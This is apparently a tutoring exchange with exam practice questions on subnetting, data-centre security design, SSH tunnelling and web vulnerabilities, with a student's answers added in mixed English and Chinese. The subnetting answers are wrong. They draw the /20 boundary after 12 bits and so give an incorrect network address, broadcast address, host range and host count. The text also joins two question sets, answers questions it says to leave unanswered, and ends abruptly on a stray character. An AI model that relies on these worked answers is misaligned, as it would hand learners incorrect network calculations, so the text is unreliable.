Great—here are two short‑answer practice questions in English, aligned with the sample exam’s scope and difficulty. Do not include solutions; show your working where requested. If you use any commands or pseudo‑code, place them in Markdown code blocks.

Question 1 (Subnetting & Network Addressing) [Total 5 marks]
Given the IP address and prefix: 172.16.130.45/20. Answer the following:
a) Write the subnet mask in both decimal and binary forms. In the binary representation of this IP address, clearly indicate the boundary between network bits and host bits. [2 marks]

172.16.130.45->10101100.00010000.10000010.00101101
since /20, so the boundary: 10101100.0001|0000.10000010.00101101

b) Compute the network address and the broadcast address for this subnet. Show your working. [1.5 marks]

10101100.0001|0000.10000010.00101101
network:10101100.0001|0000.00000000.00000000->172.16.0.0
broadcast:10101100.0001|1111.11111111.11111111->172.31.255.255

c) State the first and last usable host addresses and the total number of usable hosts in this subnet. Show your working. [1.5 marks]

10101100.0001|0000.10000010.00101101
1st :10101100.0001|0000.00000000.00000001->172.16.0.1
last :10101100.0001|1111.11111111.11111110->172.31.255.254
sum: 2^20-2=1048574

Question 2 (Data Centre Security Architecture) [Total 9 marks]
A company data centre hosts critical services (databases, web applications, and an email server). The company also develops both internal and customer‑facing applications. Design a secure architecture covering both network and application layers. Use a simple diagram if helpful (ASCII is fine).
a) Network segmentation: Describe how you would segment and isolate critical resources (e.g., user LAN, DMZ, app tier, DB tier, management/jump/bastion). Explain the security benefits. [2 marks]

Segmentation: External → DMZ (reverse proxy/WAF) → App → DB; separate Mgmt/Bastion and Backup networks; least-privilege ACLs（分段与 ACL）.
Zero Trust: verify every user/device; IAM/MFA + ACL + microsegmentation（零信任）.
Defense-in-Depth: multiple independent controls across layers to reduce single-point failure（纵深防御，多层控制）.

b) Firewall placement and types: Specify where you would place firewalls/security controls (e.g., stateful firewall, NGFW, WAF, email security gateway) and how they control traffic. Justify your choice of firewall type(s). [3 marks]

Firewalls: edge NGFW (stateful+App-ID+IPS), east–west microsegmentation, WAF for L7（防火墙部署与理由）.

c) Encryption: Indicate where to apply encryption (in transit and at rest), which protocols/algorithms you would use, and outline key management considerations. [2 marks]

Encryption: TLS everywhere; at rest: disk/volume + DB TDE; keys via KMS/HSM; rotation and limited access（传输/静态加密与管钥）.

d) Secure coding practices: Provide at least two key practices (e.g., SAST/DAST, dependency management/SBOM, secret management, least privilege, input validation/output encoding, CI/CD security gates) and explain how they reduce risk. [2 marks]

Secure coding: input validation + output encoding; param queries; CSRF defenses; secrets mgmt; least-privileged tokens; SAST/deps/secret scans in CI/CD（安全开发实践）.

When you’re ready, submit your answers and I’ll grade them with detailed feedback.

Great—here’s a fresh set of short‑answer practice questions (no subnetting), aligned with your sample exam. I include brief “Cheatsheet cues” so you can jump to the right sections. No answers provided—send me your attempts and I’ll grade with detailed feedback.

Question 1 — Proxies, SSH Tunneling, and VPN [Total 6 marks]
A remote engineer needs to:
a) Access a single internal Jenkins UI at http://jenkins.int.local:8080 through a reachable bastion. Provide the most suitable technique, one example command, and why it fits. [2 marks]

对应句子：Local (-L): bind local port → specific internal service; best for single internal web/DB（单服务直达，常考）.
[example] ssh -L 33306:db.internal:3306 user@jump -N（本地33306→内网 db:3306）[example]临时访问内网数据库
原因：是需要从可到达的bastion到目标，因此是-ssh-L

b) Browse multiple internal web apps and use Git/SSH over one tunnel. Provide the technique, one example command, and why it fits. [2 marks]

对应句子：Dynamic (-D): local SOCKS proxy → many protocols/destinations via one tunnel（动态=SOCKS，多目标）.
[example] ssh -D 1080 user@jump -N → apps use SOCKS5 127.0.0.1:1080（浏览多个内网站点/Git/SSH）
原因：单个隧道多目标，就是-D

c) Allow a build runner in the VPC to fetch artifacts from the engineer’s laptop (laptop is behind NAT; engineer can SSH into the runner). Provide the technique, one example command, and why it fits. [2 marks]

对应句子：Reverse (-R): remote listens → connections go back to your local service（反向转发，让远端访问你本地）.
[example] ssh -R 0.0.0.0:2222:127.0.0.1:22 user@vps -N（远端2222→本地22）[example]NAT 背后回连
原因：需要从客户端连主机，是-R

Question 2 — Web Security: XSS vs CSRF vs SQLi vs RCE [Total 8 marks]
For each scenario, identify the most likely vulnerability class and give one key mitigation (1–2 lines each):
a) A comment field stores and reflects unescaped HTML so that other users’ browsers execute attacker code stealing cookies. [2 marks]

XSS: injected script runs in victim’s browser; impacts: cookie/token theft, session hijack, defacement（脚本在受害者浏览器执行）.
Defend: context-aware output encoding at sinks; CSP (restrict script-src); HttpOnly/SameSite cookies; validate/normalize input（输出点按上下文编码/CSP/HttpOnly+SameSite/输入校验）.
Examples:

• Encode HTML text:
   赏